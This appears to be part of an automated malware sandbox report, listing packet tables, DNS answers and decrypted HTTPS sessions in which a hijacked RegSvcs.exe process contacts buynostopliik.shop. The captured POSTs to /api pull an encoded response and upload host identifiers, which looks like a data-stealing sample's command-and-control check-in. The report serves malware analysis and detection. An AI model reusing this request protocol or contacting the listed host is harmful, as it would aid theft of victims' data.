Jan 14, 2025 17:59:30.574048042 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.574059963 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:33.714812994 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:33.715075016 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:33.715188026 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:33.715481997 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:33.715502977 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:33.720278978 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:33.720330954 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:33.720417976 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:33.720753908 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:33.720771074 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.189755917 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.190046072 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:34.191307068 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:34.191323042 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.191551924 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.192944050 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:34.192964077 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:34.192995071 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.671117067 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.671221972 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.671468973 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:34.671659946 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:34.671685934 CET	443	49834	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:34.671699047 CET	49834	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:34.671708107 CET	443	49834	104.21.80.1	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 17:59:21.251851082 CET	65453	53	192.168.2.6	1.1.1.1
Jan 14, 2025 17:59:21.265080929 CET	53	65453	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 17:59:21.251851082 CET	192.168.2.6	1.1.1.1	0x9446	Standard query (0)	buynostopliik.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 17:59:14.257138968 CET	1.1.1.1	192.168.2.6	0x339c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 17:59:14.257138968 CET	1.1.1.1	192.168.2.6	0x339c	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:59:21.265080929 CET	1.1.1.1	192.168.2.6	0x9446	No error (0)	buynostopliik.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:59:21.265080929 CET	1.1.1.1	192.168.2.6	0x9446	No error (0)	buynostopliik.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:59:21.265080929 CET	1.1.1.1	192.168.2.6	0x9446	No error (0)	buynostopliik.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:59:21.265080929 CET	1.1.1.1	192.168.2.6	0x9446	No error (0)	buynostopliik.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:59:21.265080929 CET	1.1.1.1	192.168.2.6	0x9446	No error (0)	buynostopliik.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:59:21.265080929 CET	1.1.1.1	192.168.2.6	0x9446	No error (0)	buynostopliik.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:59:21.265080929 CET	1.1.1.1	192.168.2.6	0x9446	No error (0)	buynostopliik.shop		104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

buynostopliik.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49753	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:59:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: buynostopliik.shop
2025-01-14 16:59:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-14 16:59:22 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dpv8otd7uea8vmtfa175b1kb9k; expires=Sat, 10 May 2025 10:46:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTIwSaONOwjXtrNaiaNzLpcUwhnz47hwvURduPaFm7uXwMgYKzsHEtrUc6CTWvCPiSPLBcTaZ4VCgv1c4W5NnRMiNrdlSJEJ8eqB6r82b%2BXa48GT68%2FU%2BmTkOnAg1L5b3Zi%2BY%2Bg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d15b93043ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1687&rtt_var=639&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=909&delivery_rate=1705607&cwnd=228&unsent_bytes=0&cid=83819e80b6eaada0&ts=825&x=0"
2025-01-14 16:59:22 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-14 16:59:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49762	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:59:23 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: buynostopliik.shop
2025-01-14 16:59:23 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4e 4e 61 57 43 4d 2d 2d 54 45 53 54 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=NNaWCM--TEST&j=
2025-01-14 16:59:23 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ajp64iipooodktdi2ql5b56e2s; expires=Sat, 10 May 2025 10:46:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41KtvDymkegLiwU1jf65WNlvwy%2B33i3AAC8dLq%2BGYCAPMEtt0i5VpRvZGGjomusR2%2FWThD5baY3oh0eijt2J%2FnCGVfMoIeDkcH5Q%2FGH2WtXYM9Tbl5QIC4oW2AD%2BW1qTnCsKUls%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d1eafe00f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1605&rtt_var=829&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1160572&cwnd=231&unsent_bytes=0&cid=697570b3b9a239a9&ts=630&x=0"
2025-01-14 16:59:23 UTC	236	IN	Data Raw: 31 34 38 64 0d 0a 6b 6d 53 74 6a 6e 37 42 63 35 41 37 52 6e 32 66 56 4a 70 76 47 72 30 4e 34 4b 4b 69 6f 4a 68 6e 5a 33 6b 77 69 6d 6e 68 39 6a 58 70 52 74 75 73 52 50 56 66 73 6b 67 6a 58 36 55 67 36 42 70 2f 6b 53 2b 42 78 6f 43 61 2f 67 59 4c 43 6c 57 6d 53 35 65 62 46 36 67 43 7a 4f 49 4e 70 46 2b 79 58 6a 35 66 70 51 2f 68 54 58 2f 54 4c 39 71 41 78 38 72 36 42 67 73 62 55 65 45 47 6b 5a 70 57 2b 67 6a 4b 35 68 75 69 46 2f 46 58 4b 78 6a 36 4d 66 73 46 64 4e 52 67 69 4d 2b 41 6a 4c 6f 43 48 56 73 4b 71 43 53 45 67 6c 54 66 42 64 37 6c 58 4c 78 66 36 78 6b 6a 45 37 31 75 75 41 35 2f 33 32 47 47 78 73 6e 49 38 41 38 44 47 6c 54 67 47 59 69 51 58 66 6f 47 79 65 63 52 71 77 50 38 58 53 77 54 2f 44 Data Ascii: 148dkmStjn7Bc5A7Rn2fVJpvGr0N4KKioJhnZ3kwimnh9jXpRtusRPVfskgjX6Ug6Bp/kS+BxoCa/gYLClWmS5ebF6gCzOINpF+yXj5fpQ/hTX/TL9qAx8r6BgsbUeEGkZpW+gjK5huiF/FXKxj6MfsFdNRgiM+AjLoCHVsKqCSEglTfBd7lXLxf6xkjE71uuA5/32GGxsnI8A8DGlTgGYiQXfoGyecRqwP8XSwT/D
2025-01-14 16:59:23 UTC	1369	IN	Data Raw: 76 37 54 54 61 66 61 4a 71 41 6d 49 4b 70 4e 77 59 4b 51 2f 30 47 6b 35 49 58 37 30 6a 57 72 42 75 76 55 61 6f 5a 4c 42 50 7a 4d 2f 73 43 66 39 35 76 6b 4d 2f 41 77 66 49 4e 41 52 46 64 35 77 53 4e 6e 6c 44 34 44 38 6a 6a 47 36 73 58 2f 56 70 6b 55 62 30 78 34 45 30 67 6e 30 2b 53 77 38 50 57 39 78 52 46 42 42 7a 78 53 34 53 59 46 36 68 47 79 65 49 64 72 68 48 67 55 53 38 55 2b 43 54 7a 42 48 58 53 62 34 2f 4b 7a 38 48 36 41 67 38 52 58 65 49 50 6a 70 6c 52 38 41 61 50 6f 6c 79 6b 43 62 49 42 5a 44 7a 34 4a 76 38 42 62 70 31 56 77 74 2b 4f 32 37 6f 43 43 56 73 4b 71 41 4f 47 6c 31 54 37 43 63 7a 6b 46 37 45 52 34 46 38 70 47 75 38 77 2f 51 4e 79 33 48 32 49 7a 73 62 42 38 77 34 4d 48 6c 58 73 53 38 33 55 55 4f 68 47 6c 36 77 39 72 68 72 2b 55 7a 4d 66 76 Data Ascii: v7TTafaJqAmIKpNwYKQ/0Gk5IX70jWrBuvUaoZLBPzM/sCf95vkM/AwfINARFd5wSNnlD4D8jjG6sX/VpkUb0x4E0gn0+Sw8PW9xRFBBzxS4SYF6hGyeIdrhHgUS8U+CTzBHXSb4/Kz8H6Ag8RXeIPjplR8AaPolykCbIBZDz4Jv8Bbp1Vwt+O27oCCVsKqAOGl1T7CczkF7ER4F8pGu8w/QNy3H2IzsbB8w4MHlXsS83UUOhGl6w9rhr+UzMfv
2025-01-14 16:59:23 UTC	1369	IN	Data Raw: 34 30 33 32 4f 79 73 62 4e 39 77 6c 46 56 52 4c 76 45 38 50 4d 46 39 6f 46 32 2b 38 57 34 53 54 78 56 79 6f 59 36 33 62 6e 51 32 47 66 61 49 36 41 6d 49 4c 33 42 41 30 64 51 4f 63 47 67 4a 70 5a 2f 77 50 41 35 42 79 6a 48 50 64 64 4c 78 54 2b 4f 2f 77 66 63 74 39 6e 68 38 48 4b 79 4c 70 4c 52 52 78 4b 71 46 50 44 70 55 44 37 52 50 72 76 45 71 30 57 35 42 6b 37 55 65 52 32 2f 77 45 34 68 79 2b 50 79 4d 58 48 39 51 51 50 46 56 66 69 42 34 75 61 56 4f 49 4a 79 2b 77 51 71 78 76 2f 56 79 41 58 39 44 33 7a 43 33 6a 65 5a 63 4b 4f 67 4d 58 69 52 56 31 62 5a 75 38 48 6a 70 73 56 78 51 58 42 34 68 75 31 55 65 30 58 50 56 2f 36 4f 72 68 56 4f 4e 4e 6d 67 73 76 4b 78 76 6f 43 43 42 35 52 37 77 69 4f 6b 31 33 2b 41 63 76 67 46 61 34 58 38 6c 34 67 47 75 38 7a 38 51 Data Ascii: 4032OysbN9wlFVRLvE8PMF9oF2+8W4STxVyoY63bnQ2GfaI6AmIL3BA0dQOcGgJpZ/wPA5ByjHPddLxT+O/wfct9nh8HKyLpLRRxKqFPDpUD7RPrvEq0W5Bk7UeR2/wE4hy+PyMXH9QQPFVfiB4uaVOIJy+wQqxv/VyAX9D3zC3jeZcKOgMXiRV1bZu8HjpsVxQXB4hu1Ue0XPV/6OrhVONNmgsvKxvoCCB5R7wiOk13+AcvgFa4X8l4gGu8z8Q
2025-01-14 16:59:23 UTC	1369	IN	Data Raw: 6a 4e 61 41 33 62 51 63 52 52 78 65 71 46 50 44 6e 56 37 69 43 4d 48 6c 45 61 55 5a 39 56 63 70 46 50 73 39 2f 77 70 2b 30 6d 65 50 78 63 50 44 2f 67 38 58 47 46 6e 69 42 6f 6e 55 47 62 41 42 31 36 78 45 34 7a 62 2b 63 44 51 45 37 79 43 34 45 6a 62 47 4c 34 58 4d 67 4a 71 36 42 67 6f 53 58 65 41 44 6a 4a 74 54 2f 67 44 4a 34 52 6d 73 47 2b 42 52 4b 68 4c 32 4f 66 4d 66 65 4e 4a 72 6a 73 54 49 79 66 42 46 53 31 74 56 38 45 76 62 31 47 4c 39 43 63 2f 76 43 75 4d 4f 76 45 42 6b 47 50 46 32 6f 45 31 30 30 57 2b 4e 7a 4d 7a 4a 38 67 51 4a 46 56 58 74 41 6f 75 63 52 66 45 43 78 2b 30 53 72 42 44 32 58 43 45 62 2b 6a 4c 2b 41 6a 69 52 4c 34 58 59 67 4a 71 36 4b 69 49 75 45 4d 6b 78 77 34 73 5a 36 55 62 49 34 46 7a 37 55 66 35 61 4b 42 66 79 4d 50 45 42 63 74 5a Data Ascii: jNaA3bQcRRxeqFPDnV7iCMHlEaUZ9VcpFPs9/wp+0mePxcPD/g8XGFniBonUGbAB16xE4zb+cDQE7yC4EjbGL4XMgJq6BgoSXeADjJtT/gDJ4RmsG+BRKhL2OfMfeNJrjsTIyfBFS1tV8Evb1GL9Cc/vCuMOvEBkGPF2oE100W+NzMzJ8gQJFVXtAoucRfECx+0SrBD2XCEb+jL+AjiRL4XYgJq6KiIuEMkxw4sZ6UbI4Fz7Uf5aKBfyMPEBctZ
2025-01-14 16:59:23 UTC	926	IN	Data Raw: 38 62 35 41 51 41 55 55 2b 6b 4e 6b 5a 4e 65 34 67 6a 43 34 78 53 72 47 50 4e 64 49 52 4c 37 4f 76 49 4d 66 39 46 68 69 6f 43 4f 67 76 30 64 52 55 4d 53 79 52 75 59 68 6b 48 39 4a 38 4c 6a 58 4c 78 66 36 78 6b 6a 45 37 31 75 75 41 52 71 32 32 4b 51 79 63 66 4d 39 51 59 58 47 6c 2f 6a 47 59 53 62 55 2f 63 4b 79 65 4d 61 6f 68 54 34 56 53 4d 61 39 6a 6e 30 54 54 61 66 61 4a 71 41 6d 49 4c 55 44 68 59 4d 55 65 59 41 6c 59 38 58 37 30 6a 57 72 42 75 76 55 61 6f 5a 4a 78 54 32 4d 76 67 42 65 4e 74 69 67 74 4c 50 78 66 30 4d 44 67 6c 59 37 77 79 49 6e 46 7a 2f 41 4e 33 67 45 72 45 55 34 45 74 6b 55 62 30 78 34 45 30 67 6e 31 6d 46 30 4e 44 42 75 44 51 54 47 45 54 6a 42 6f 2f 55 53 4c 34 66 6a 2b 73 51 34 30 6d 79 58 79 73 57 2f 6a 6e 35 42 48 54 53 61 6f 76 46 Data Ascii: 8b5AQAUU+kNkZNe4gjC4xSrGPNdIRL7OvIMf9FhioCOgv0dRUMSyRuYhkH9J8LjXLxf6xkjE71uuARq22KQycfM9QYXGl/jGYSbU/cKyeMaohT4VSMa9jn0TTafaJqAmILUDhYMUeYAlY8X70jWrBuvUaoZJxT2MvgBeNtigtLPxf0MDglY7wyInFz/AN3gErEU4EtkUb0x4E0gn1mF0NDBuDQTGETjBo/USL4fj+sQ40myXysW/jn5BHTSaovF
2025-01-14 16:59:23 UTC	1369	IN	Data Raw: 33 35 30 37 0d 0a 52 6e 32 4e 66 49 43 66 39 6c 72 67 73 76 48 7a 50 77 41 44 68 49 53 70 6b 75 45 6a 42 65 6f 52 75 6e 50 44 72 45 6a 2f 46 6f 2f 58 2b 4a 34 34 55 31 2f 30 79 2f 61 67 4d 76 4b 39 52 63 41 45 6c 72 73 41 6f 4f 51 58 66 30 42 7a 2b 6b 52 70 68 58 38 58 53 4d 66 38 54 6e 2f 42 58 66 62 62 34 32 41 6a 6f 4c 39 48 55 56 44 45 73 67 41 6c 62 56 5a 2b 78 53 50 38 31 4b 36 55 66 56 56 5a 45 65 39 4f 50 45 4d 63 4e 46 6a 69 73 54 53 77 76 45 4d 43 68 70 64 36 41 69 43 6e 6c 2f 69 41 4d 2f 6e 46 4b 51 5a 39 6c 63 32 48 76 4a 32 74 6b 31 2f 78 79 2f 61 67 50 48 55 2f 51 49 4b 57 58 76 76 45 49 4b 65 56 50 73 4b 6a 2f 4e 53 75 6c 48 31 56 57 52 48 76 54 76 30 41 48 7a 4e 59 34 4c 41 79 63 58 77 46 77 6f 55 58 2b 73 4c 68 6f 5a 57 34 67 6e 45 36 52 Data Ascii: 3507Rn2NfICf9lrgsvHzPwADhISpkuEjBeoRunPDrEj/Fo/X+J44U1/0y/agMvK9RcAElrsAoOQXf0Bz+kRphX8XSMf8Tn/BXfbb42AjoL9HUVDEsgAlbVZ+xSP81K6UfVVZEe9OPEMcNFjisTSwvEMChpd6AiCnl/iAM/nFKQZ9lc2HvJ2tk1/xy/agPHU/QIKWXvvEIKeVPsKj/NSulH1VWRHvTv0AHzNY4LAycXwFwoUX+sLhoZW4gnE6R
2025-01-14 16:59:23 UTC	1369	IN	Data Raw: 53 79 38 4e 39 6a 37 37 41 33 44 57 62 34 7a 41 77 63 2f 36 52 55 74 62 56 66 42 4c 32 39 52 79 30 78 48 5a 35 6c 36 41 42 75 52 54 49 78 50 72 50 66 6b 4f 62 74 4a 2f 77 6f 36 41 30 2f 30 55 52 55 4e 45 2b 42 79 45 69 78 6e 70 52 73 6a 67 58 50 74 52 2b 56 59 71 45 76 59 79 38 51 68 77 33 47 71 48 79 73 7a 4f 2b 77 30 4d 45 56 66 74 44 59 6d 58 57 66 38 48 77 2b 67 56 72 52 69 79 46 32 51 59 35 58 61 67 54 55 37 50 61 4a 72 4e 30 49 44 49 42 68 51 4b 52 2b 55 62 68 64 5a 34 38 77 72 4d 36 52 75 7a 55 65 30 58 50 56 2f 36 4f 72 68 56 4f 4e 39 72 6a 73 50 48 7a 50 55 49 43 68 78 5a 35 77 47 4e 68 6c 6a 31 44 73 50 6b 45 62 45 62 2b 45 73 74 46 76 41 34 38 42 39 37 6e 79 48 43 78 39 69 43 6f 6b 55 33 45 56 48 6b 48 59 36 62 46 2b 39 49 31 71 77 62 72 31 47 Data Ascii: Sy8N9j77A3DWb4zAwc/6RUtbVfBL29Ry0xHZ5l6ABuRTIxPrPfkObtJ/wo6A0/0URUNE+ByEixnpRsjgXPtR+VYqEvYy8Qhw3GqHyszO+w0MEVftDYmXWf8Hw+gVrRiyF2QY5XagTU7PaJrN0IDIBhQKR+UbhdZ48wrM6RuzUe0XPV/6OrhVON9rjsPHzPUIChxZ5wGNhlj1DsPkEbEb+EstFvA48B97nyHCx9iCokU3EVHkHY6bF+9I1qwbr1G
2025-01-14 16:59:23 UTC	1369	IN	Data Raw: 74 77 37 38 77 46 31 30 47 54 43 6a 6f 44 45 75 6c 31 56 56 52 4c 73 47 73 50 4d 42 36 4a 64 6d 72 39 4c 38 30 50 74 46 7a 31 66 36 33 61 67 58 7a 61 66 66 63 4b 59 67 49 58 35 46 78 63 64 55 66 34 49 78 4b 70 70 30 78 48 5a 35 67 66 68 4e 2f 56 49 4c 51 6e 77 4a 4d 59 7a 56 74 4a 75 67 63 36 43 38 2b 77 49 46 52 68 58 37 7a 57 39 6d 6c 44 6b 41 63 48 71 48 4f 4e 66 73 6c 5a 6b 52 38 52 32 73 45 31 48 6b 53 2b 61 67 4a 69 43 7a 77 59 4c 46 56 58 2b 47 73 36 33 51 4f 59 4d 31 4b 34 36 70 41 44 37 54 79 6b 4e 76 58 69 34 43 7a 69 48 50 38 79 41 78 4e 4f 36 58 56 56 4a 43 62 31 59 31 4d 51 46 37 30 6a 57 72 41 72 6a 53 61 41 58 5a 41 32 39 62 72 68 4b 65 38 31 39 68 4d 50 57 77 62 30 37 4f 7a 74 5a 2f 67 71 4f 6e 31 76 4f 4f 4e 72 76 45 71 30 57 35 45 68 6b Data Ascii: tw78wF10GTCjoDEul1VVRLsGsPMB6Jdmr9L80PtFz1f63agXzaffcKYgIX5FxcdUf4IxKpp0xHZ5gfhN/VILQnwJMYzVtJugc6C8+wIFRhX7zW9mlDkAcHqHONfslZkR8R2sE1HkS+agJiCzwYLFVX+Gs63QOYM1K46pAD7TykNvXi4CziHP8yAxNO6XVVJCb1Y1MQF70jWrArjSaAXZA29brhKe819hMPWwb07OztZ/gqOn1vOONrvEq0W5Ehk
2025-01-14 16:59:23 UTC	1369	IN	Data Raw: 70 44 4f 4d 30 76 32 6f 43 48 77 65 67 58 41 78 68 45 36 30 79 39 71 6d 4c 7a 43 4d 48 72 43 70 59 53 34 31 6f 6b 46 4d 4d 49 32 51 4e 7a 32 47 4f 55 2f 76 37 33 2b 51 73 4c 48 45 54 35 53 38 33 55 57 4c 42 65 39 71 78 55 34 79 36 38 47 54 78 66 70 58 62 4e 44 6e 62 52 61 4a 54 52 6a 66 66 35 46 41 59 62 57 61 68 46 77 35 49 58 71 46 53 42 72 42 69 79 55 61 6f 4a 64 6b 53 6f 5a 61 39 64 4b 73 41 68 6d 34 44 57 67 71 4a 58 53 31 74 41 71 46 50 44 30 31 54 69 46 4d 6e 76 43 71 42 57 7a 47 63 43 48 50 6f 77 2b 77 4e 76 7a 69 32 74 77 38 76 4f 39 67 49 54 4a 57 7a 39 43 49 32 61 55 4f 59 58 6a 36 4a 63 72 46 47 71 59 47 51 4f 39 7a 47 30 52 54 54 4f 66 49 7a 4c 31 73 57 36 4f 6b 74 62 53 71 68 54 77 36 46 55 2f 67 6a 49 2b 67 33 75 4e 2f 46 65 49 68 7a 7a 49 Data Ascii: pDOM0v2oCHwegXAxhE60y9qmLzCMHrCpYS41okFMMI2QNz2GOU/v73+QsLHET5S83UWLBe9qxU4y68GTxfpXbNDnbRaJTRjff5FAYbWahFw5IXqFSBrBiyUaoJdkSoZa9dKsAhm4DWgqJXS1tAqFPD01TiFMnvCqBWzGcCHPow+wNvzi2tw8vO9gITJWz9CI2aUOYXj6JcrFGqYGQO9zG0RTTOfIzL1sW6OktbSqhTw6FU/gjI+g3uN/FeIhzzI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49771	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:59:24 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HQIAMERQIDZ9X5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12834 Host: buynostopliik.shop
2025-01-14 16:59:24 UTC	12834	OUT	Data Raw: 2d 2d 48 51 49 41 4d 45 52 51 49 44 5a 39 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 33 34 33 34 35 30 41 33 42 30 43 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 48 51 49 41 4d 45 52 51 49 44 5a 39 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 51 49 41 4d 45 52 51 49 44 5a 39 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 54 45 53 54 0d 0a 2d 2d 48 51 49 41 4d 45 52 51 49 Data Ascii: --HQIAMERQIDZ9X5Content-Disposition: form-data; name="hwid"C8E343450A3B0C22B960CC18D99B375A--HQIAMERQIDZ9X5Content-Disposition: form-data; name="pid"2--HQIAMERQIDZ9X5Content-Disposition: form-data; name="lid"NNaWCM--TEST--HQIAMERQI
2025-01-14 16:59:26 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n4t5g5oabliq4g2fv0s59mna19; expires=Sat, 10 May 2025 10:46:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aG0oR4xQyr9kOwhQJ1SHCz91bM4Y%2BZwRKnOy32J1wikXcQ9KeZwenhU2zAJ4oRHXqvvtCbybKK0q9sZ%2Bez%2BmZFf2GwdZ94dIBDCXZUYL%2BTawiwSFzr9SkctQtVFVygfQmsLJW1I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d25cf410f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1493&rtt_var=612&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13772&delivery_rate=1716637&cwnd=231&unsent_bytes=0&cid=4522b52c7249056a&ts=1929&x=0"
2025-01-14 16:59:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:59:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49788	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:59:26 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=04HQVGZ145 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15056 Host: buynostopliik.shop
